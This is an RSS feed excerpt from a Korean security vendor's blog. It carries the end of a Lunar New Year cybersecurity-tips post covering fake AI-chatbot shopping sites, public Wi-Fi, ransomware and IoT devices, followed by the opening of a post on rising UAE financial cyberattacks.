&lt;p style=&quot;margin: 0; font-weight: bold;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #333333; text-align: start;&quot;&gt;  이렇게 대비하세요!&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;▪︎ &lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #333333; text-align: start;&quot;&gt;출처가 불분명한 문자의 링크 클릭이나 전화 연결은 피하세요.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;▪︎ &lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #333333; text-align: start;&quot;&gt;결제&amp;middot;배송 확인은 반드시 공식 앱이나 웹사이트를 통해 직접 진행하세요.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;▪︎ &lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #333333; text-align: start;&quot;&gt;스마트폰에는 신뢰할 수 있는 모바일 백신을 설치하고 실시간 감시 기능을 활성화하세요.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 style=&quot;color: #000000; text-align: start;&quot; data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #006dd7;&quot;&gt;&lt;b&gt;AI 위장 쇼핑몰&amp;middot;가짜 고객센터 주의&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;3) AI 챗봇이 있는 사이트라고 해서 안전하지는 않습니다!&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;2026년의 새로운 위협 중 하나는 AI 챗봇을 탑재한 가짜 사이트입니다. 설 연휴 선물 구매가 늘어나는 시기, 공격자들은 생성형 AI를 활용해 가짜 쇼핑몰이나 고객센터 사이트를 대량 생성합니다. 정상 쇼핑몰과 매우 유사한 디자인과 자연스러운 상담으로 사용자를 안심시킨 뒤, 결제 정보나 개인정보 입력을 유도하는 방식입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;특히 SNS 광고나 검색 결과를 통해 노출되는 &amp;lsquo;특가 할인&amp;rsquo; 사이트 중 일부는 이러한 위장 사이트일 가능성이 있어 각별한 주의가 필요합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div style=&quot;background-color: #f8f9fa; border-left: 5px solid #dee2e6; padding: 15px 20px; margin: 20px 0; color: #495057;&quot;&gt;
&lt;p style=&quot;margin: 0; font-weight: bold;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #333333; text-align: start;&quot;&gt;  이렇게 대비하세요!&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;▪︎&lt;span&gt; &lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #333333; text-align: start;&quot;&gt;처음 방문하는 쇼핑몰은 사업자 정보, 고객 후기, 도메인 등록 정보를 확인하세요.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;▪︎&lt;span&gt; &lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #333333; text-align: start;&quot;&gt;과도한 할인율을 강조하는 광고 링크는 의심하고, 공식 사이트 주소를 직접 입력해 접속하세요.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;▪︎&lt;span&gt; &lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #333333; text-align: start;&quot;&gt;콘텐츠 다운로드는 반드시&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;u&gt;공식 앱스토어 또는 공식 웹사이트&lt;/u&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #333333; text-align: start;&quot;&gt;를 이용하세요.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 style=&quot;color: #000000; text-align: start;&quot; data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #006dd7;&quot;&gt;&lt;b&gt;네트워크 보안 점검&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;4) 여행지에서의 공용 Wi-Fi 사용, 주의하세요!&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;귀성길이나 여행지에서 공개 Wi-Fi를 사용하는 경우, 공격자가 정상 Wi-Fi 이름을 위장하거나 DNS를 조작해 피싱 사이트로 유도하는 위험이 존재합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;2026년에는 스마트폰 AI 비서나 에이전트 앱이 백그라운드에서 자동으로 네트워크에 접속하는 사례도 늘어나며, 불안정한 네트워크 환경에서 정보 노출 가능성이 커졌습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div style=&quot;background-color: #f8f9fa; border-left: 5px solid #dee2e6; padding: 15px 20px; margin: 20px 0; color: #495057;&quot;&gt;
&lt;p style=&quot;margin: 0; font-weight: bold;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #333333; text-align: start;&quot;&gt;  이렇게 대비하세요!&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;▪︎&lt;span&gt;&lt;span&gt; &lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #333333; text-align: start;&quot;&gt;공개 Wi-Fi 사용 시 금융 거래나 로그인 서비스 이용은 자제하세요.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;▪︎&lt;span&gt;&lt;span&gt; &lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #333333; text-align: start;&quot;&gt;불가피할 경우 VPN 사용을 고려하세요.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;▪︎&lt;span&gt;&lt;span&gt; &lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #333333; text-align: start;&quot;&gt;AI 에이전트&amp;middot;비서 앱의 네트워크 접근 권한과 백그라운드 활동을 점검하세요.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 style=&quot;color: #000000; text-align: start;&quot; data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #006dd7;&quot;&gt;&lt;b&gt;기업 보안 담당자를 위한 점검 포인트&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;5) &lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;연휴 기간, 기업 보안 공백을 노린 랜섬웨어에 대비하세요!&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;연휴와 주말은 기업 보안 공백을 노린 공격이 집중되는 시기입니다. 최근 랜섬웨어 공격은 MFA 우회, 공급망 침투, 자동화된 AI 공격과 결합되며 더욱 고도화되고 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;오픈소스 패키지를 사칭하는 공격이나 클라우드 서비스를 경유한 공격도 빈번하게 발생하고 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div style=&quot;background-color: #f8f9fa; border-left: 5px solid #dee2e6; padding: 15px 20px; margin: 20px 0; color: #495057;&quot;&gt;
&lt;p style=&quot;margin: 0; font-weight: bold;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #333333; text-align: start;&quot;&gt;  &lt;b&gt;기업 보안 담당자라면, 이렇게 대비하세요!&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;▪︎&lt;span&gt;&lt;span&gt;&lt;span&gt; &lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #333333; text-align: start;&quot;&gt;연휴 전 서버, 인프라, 임직원 PC의 보안 패치를 완료하세요.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;▪︎&lt;span&gt;&lt;span&gt;&lt;span&gt; &lt;u&gt;중요 데이터는 3-2-1 백업 원칙에 따라 오프라인 백업&lt;/u&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #333333; text-align: start;&quot;&gt;을 반드시 점검하세요.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;▪︎&lt;span&gt;&lt;span&gt;&lt;span&gt; &lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #333333; text-align: start;&quot;&gt;비상 연락망과 연휴 중 모니터링 체계를 사전에 확인하세요.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; background-color: #f8f9fa; color: #333333; text-align: start;&quot;&gt;▪︎&lt;/span&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; background-color: #f8f9fa; color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&lt;span&gt;&lt;span&gt; &lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #333333; text-align: start;&quot;&gt;새로 도입한 AI 시스템&amp;middot;챗봇의 접근 권한과 인증 설정을 재점검하세요.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 style=&quot;color: #000000; text-align: start;&quot; data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #006dd7;&quot;&gt;&lt;b&gt;IoT 보안 및 개인정보 노출 주의&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;6) &lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;귀성&amp;middot;여행 전, 스마트홈과 SNS를 점검하세요!&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;연휴 동안 장기간 집을 비우는 가정이 늘어나면서 스마트 도어락, IP 카메라 등 IoT 기기를 노린 공격 위험도 증가합니다. 기본 비밀번호를 그대로 사용하거나 패치가 적용되지 않은 기기는 AI 기반 자동 공격의 대상이 될 수 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;또한 SNS에 실시간으로 여행 일정이나 위치를 공유하는 행위는 부재중인 가정을 노출시키거나, 사회공학적 공격의 단서가 될 수 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div style=&quot;background-color: #f8f9fa; border-left: 5px solid #dee2e6; padding: 15px 20px; margin: 20px 0; color: #495057;&quot;&gt;
&lt;p style=&quot;margin: 0; font-weight: bold;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #333333; text-align: start;&quot;&gt; &lt;span&gt; &lt;/span&gt;&lt;b&gt;이렇게 대비하세요!&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;▪︎&lt;span&gt;&lt;span&gt;&lt;span&gt;&lt;span&gt; &lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #333333; text-align: start;&quot;&gt;스마트홈 기기의 펌웨어를 최신 버전으로 업데이트하고 기본 비밀번호를 변경하세요.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;▪︎&lt;span&gt;&lt;span&gt;&lt;span&gt;&lt;span&gt; &lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #333333; text-align: start;&quot;&gt;외부 접근이 가능한 기기에는&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;u&gt;2단계 인증&lt;/u&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #333333; text-align: start;&quot;&gt;을 설정하세요.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;▪︎&lt;span&gt;&lt;span&gt;&lt;span&gt;&lt;span&gt; &lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #333333; text-align: start;&quot;&gt;여행 중 SNS 실시간 게시물 업로드는 자제하고, 귀가 후 공유하세요.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; background-color: #f8f9fa; color: #333333; text-align: start;&quot;&gt;▪︎&lt;/span&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; background-color: #f8f9fa; color: #333333; text-align: start;&quot;&gt;&lt;span&gt;&lt;span&gt;&lt;span&gt;&lt;span&gt; &lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #333333; text-align: start;&quot;&gt;사용하지 않는 IoT 기기는 전원을 끄거나 네트워크 연결을 해제하세요.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;AI 기술의 발전은 생활을 더욱 편리하게 만들고 있지만, 이를 악용한 사이버 위협 역시 함께 진화하고 있습니다. 위 보안 수칙을 한 번 더 점검하시고, 이스트시큐리티와 함께 안전하고 편안한 설 연휴 보내시기 바랍니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>이스트시큐리티 소식</category>
      <category>기업보안</category>
      <category>명절보안수칙</category>
      <category>설연휴보안</category>
      <category>설연휴보안수칙</category>
      <category>알약</category>
      <category>연휴기업보안</category>
      <category>연휴보안수칙</category>
      <category>이스트시큐리티</category>
      <author>알약5</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5721</guid>
      <comments>https://alyacofficialblog.tistory.com/5721#entry5721comment</comments>
      <pubDate>Wed, 11 Feb 2026 10:24:50 +0900</pubDate>
    </item>
    <item>
      <title>온라인 금융 자산을 노린 사이버 공격 급증! 개인과 기업의 대처법은?</title>
      <link>https://alyacofficialblog.tistory.com/5718</link>
      <description>&lt;p style=&quot;text-align: right;&quot; data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light'; background-color: #eeeeee; color: #333333; text-align: start;&quot;&gt;by 이스트시큐리티 마케팅팀&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;안녕하세요, 이스트시큐리티입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;디지털 금융 환경이 고도화될수록 사이버 범죄의 표적 역시 점점 더 &amp;lsquo;현실적인 자산&amp;rsquo;으로 이동하고 있습니다. 최근 아랍에미리트연합(UAE)에서 온라인 금융 자산을 노린 사이버 공격이 급증하면서, 정부 차원의 공식 경고가 발표돼 주목받고 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Group 2034384104.png&quot; data-origin-width=&quot;1880&quot; data-origin-height=&quot;1041&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bEjdUO/dJMcaiCcXOQ/ObxHx5DpZsfvKWD9ppo8xK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bEjdUO/dJMcaiCcXOQ/ObxHx5DpZsfvKWD9ppo8xK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bEjdUO/dJMcaiCcXOQ/ObxHx5DpZsfvKWD9ppo8xK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbEjdUO%2FdJMcaiCcXOQ%2FObxHx5DpZsfvKWD9ppo8xK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1880&quot; height=&quot;1041&quot; data-filename=&quot;Group 2034384104.png&quot; data-origin-width=&quot;1880&quot; data-origin-height=&quot;1041&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&amp;nbsp;&lt;/h3&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&amp;nbsp;&lt;/h3&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;온라인 금융 자산을 노린 공격, 왜 지금 더 위험할까?&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;u&gt;&lt;span style=&quot;color: #1b711d;&quot;&gt;*UAE Cyber Security Council&lt;/span&gt;&lt;/u&gt;은 최근 성명을 통해 개인과 기업을 대상으로 한 금융 정보 탈취형 사이버 범죄가 빠르게 확산되고 있다고 경고했습니다. 공격자들은 은행 로고를 그대로 복제한 가짜 광고와 메시지를 활용해 사용자를 기만하고, 이를 통해 이메일 계정 침입이나 로그인 정보 탈취로 이어지는 공격을 시도하고 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;특히 전체 공격의 약 60%가 계정 정보 도난에서 비롯된다는 점은, 단순한 피싱을 넘어 &amp;lsquo;계정 탈취 이후의 2차 피해&amp;rsquo;가 본격화되고 있음을 보여줍니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;blockquote data-ke-style=&quot;style3&quot;&gt;&lt;span style=&quot;color: #1b711d;&quot;&gt;&lt;b&gt;*UAE Cyber Security Council&lt;/b&gt;&lt;br /&gt;&lt;/span&gt;아랍에미리트 사이버 보안 위원회)는 UAE 연방 정부 산하의 국가 사이버 보안 최고 기구로, 국가 사이버 보안 전략을 총괄&amp;middot;조정하는 국가 사이버 권위 기관 역할을 수행&lt;/blockquote&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;이러한 공격의 공통점은 기술적 취약점보다 사용자의 보안 습관을 노린다는 점입니다. 보안이 취약한 기기에 비밀번호나 금융 정보를 저장해 두거나, 출처가 불분명한 메시지를 무심코 클릭하는 순간 공격은 시작됩니다. 무료 와이파이 환경에서의 금융 거래 역시 공격자 입장에서는 매우 매력적인 침투 지점입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
